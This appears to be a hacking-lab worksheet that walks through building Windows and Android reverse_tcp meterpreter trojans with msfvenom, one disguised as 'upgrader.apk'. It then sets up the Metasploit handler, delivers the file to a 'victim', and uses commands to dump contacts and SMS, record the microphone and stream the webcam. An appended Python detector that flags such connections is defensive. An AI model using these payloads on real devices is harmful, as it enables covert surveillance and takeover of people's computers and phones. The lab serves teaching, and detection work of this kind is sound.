LAB 07 - REMOTE HACKING VIA METASPLOIT

Learning Objectives

In today’s lab, you will learn/practice:

1. Remote hacking.
2. How to remotely hack a Windows system via the msf console.
3. How to remotely hack an Android phone via the msf console.

Practice Exercise

Windows Hacking:

1. Windows systems are vulnerable to Trojan attacks regardless of version. Open a terminal in
Kali Linux and type

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST="attacker ip" LPORT=444 -o /root/Desktop/trojan.exe

A Trojan will be generated on the desktop. A Trojan or backdoor can give remote
access to the target machine. We are using a reverse_tcp Trojan, which is specially
crafted malware that establishes a remote connection from the victim machine to
the hacker machine over TCP. This allows the hacker to breach the machine and
take full control of it. Transfer the file created above to the victim’s PC and
move on to the handler section.
2. Start the Metasploit Framework console as follows:
root@kali:~# msfconsole
3. Now it's time to open and set up the multi-handler. Follow these steps:
msf>use multi/handler
msf exploit(handler)>set payload windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST "attacker ip"
msf exploit(handler)>set LPORT 444
msf exploit(handler)>exploit
Payload Handler is being started........
4. When the victim clicks on the .exe file in his system, a meterpreter session will be
established.
5. Type meterpreter>help to find a list of commands and use them to exploit the
compromised PC.

Android Hacking:

1. Open a terminal in Kali Linux and type

#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > /root/Desktop/upgrader.apk
(To know your LHOST, open a new terminal and type ifconfig).
2. Transfer/mail this file (here upgrader.apk) to the victim's phone and install it.
3. Start the Metasploit Framework console as follows:
root@kali:~# msfconsole
4. Now it's time to open and set up the multi-handler. Follow these steps:
msf>use multi/handler
msf exploit(handler)>set payload android/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST "attacker ip"
msf exploit(handler)>set LPORT 4444
msf exploit(handler)>exploit
Payload Handler is being started........
5. When the victim clicks on the app (installed as MAIN ACTIVITY in the menu) in his
phone, a meterpreter session will be established.
6. To start exploiting the compromised phone, type
sysinfo          gets information about the device
ps               displays ongoing processes
dump_contacts    fetches all contacts
dump_sms         fetches all received/sent messages
record_mic 5     records for x seconds (here x = 5)
webcam_list      displays the cameras available
webcam_snap      displays a snapshot of the current activity
webcam_stream    starts live video streaming from the compromised device
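
Seen from the defender's side, the reverse_tcp behaviour described in this lab appears as a connection initiated by the victim machine to the listener's LHOST and LPORT. The following is an added example, not part of the original lab sheet, that scores connection records for that pattern; the log columns, weights, threshold and sample records are assumptions constructed for illustration.

```python
import csv
import io
import ipaddress

# LPORT values used in this lab; 4444 is also Metasploit's default LPORT.
LAB_PORTS = {444, 4444}
# Destination ports ordinary clients are expected to use (assumption; tune per site).
EXPECTED_PORTS = {53, 80, 123, 443}
# User-writable locations where a transferred executable usually lands.
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")
FIELDS = ["time", "src", "dst", "dport", "image"]  # hypothetical log columns

# Constructed sample records (not real traffic); image is empty for a phone
# that is only visible at the firewall.
SAMPLE_LOG = r"""
2024-05-01T10:00:01,192.168.0.25,203.0.113.5,443,C:\Program Files\Mozilla Firefox\firefox.exe
2024-05-01T10:02:10,192.168.0.25,203.0.113.9,443,C:\Users\lab\Downloads\setup.exe
2024-05-01T10:03:44,192.168.0.31,198.51.100.7,8443,C:\Program Files\Agent\agent.exe
2024-05-01T10:05:12,192.168.0.25,192.168.0.110,444,C:\Users\lab\Desktop\trojan.exe
2024-05-01T10:07:30,192.168.0.42,192.168.0.110,4444,
2024-05-01T10:09:02,192.168.0.31,198.51.100.7,8080,C:\Users\lab\AppData\Local\Temp\u.exe
"""


def score(rec):
    """Return (points, reasons) for one outbound connection record."""
    points, reasons = 0, []
    if not ipaddress.ip_address(rec["src"]).is_private:
        return points, reasons  # only judge connections initiated from inside
    port = int(rec["dport"])
    if port in LAB_PORTS:
        points, reasons = points + 2, reasons + ["handler port from this lab"]
    elif port not in EXPECTED_PORTS:
        points, reasons = points + 1, reasons + ["unexpected destination port"]
    if any(d in (rec["image"] or "").lower() for d in USER_WRITABLE):
        points, reasons = points + 1, reasons + ["image in user-writable directory"]
    return points, reasons


def find_suspects(log_text, threshold=2):
    """Return (src, dst, port, reasons) for records scoring >= threshold."""
    hits = []
    for rec in csv.DictReader(io.StringIO(log_text.strip()), fieldnames=FIELDS):
        points, reasons = score(rec)
        if points >= threshold:
            hits.append((rec["src"], rec["dst"], int(rec["dport"]), reasons))
    return hits


if __name__ == "__main__":
    for hit in find_suspects(SAMPLE_LOG):
        print(hit)
```

A port match alone is weak evidence because LPORT is freely chosen, which is why the process location is scored as a second, independent signal.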
